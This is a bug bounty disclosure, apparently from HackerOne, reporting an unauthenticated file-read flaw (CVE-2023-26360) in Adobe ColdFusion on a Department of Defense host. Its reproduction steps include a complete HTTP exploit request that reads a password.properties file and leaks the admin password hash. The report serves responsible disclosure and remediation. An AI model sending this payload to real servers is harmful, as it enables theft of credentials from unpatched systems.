Lucene search

K
hackeroneR00tdaddyH1:2248781
HistoryNov 11, 2023 - 5:02 p.m.

U.S. Dept Of Defense: Unauthenticated File Read Adobe ColdFusion

2023-11-1117:02:47
r00tdaddy
hackerone.com
38
adobe coldfusion
unauthenticated file read
sensitive data access
security patches
arbitrary file read
cve-2023-26360

AI Score

6.8

Confidence

Low

EPSS

0.965

Percentile

99.6%

Unauthenticated Arbitrary File Read vulnerability due to de serialization of untrusted data in Adobe ColdFusion.

Impact

The impact of this vulnerability could result in unauthorized access to sensitive data and actions within the affected Adobe ColdFusion instances.

System Host(s)

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

Affected Product(s) and Version(s)

The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier

CVE Numbers

CVE-2023-26360

Steps to Reproduce

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
Host: β–ˆβ–ˆβ–ˆ
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 121
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/…/lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d

Password hash is disclosed in the response:

Suggested Mitigation/Remediation Actions

Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.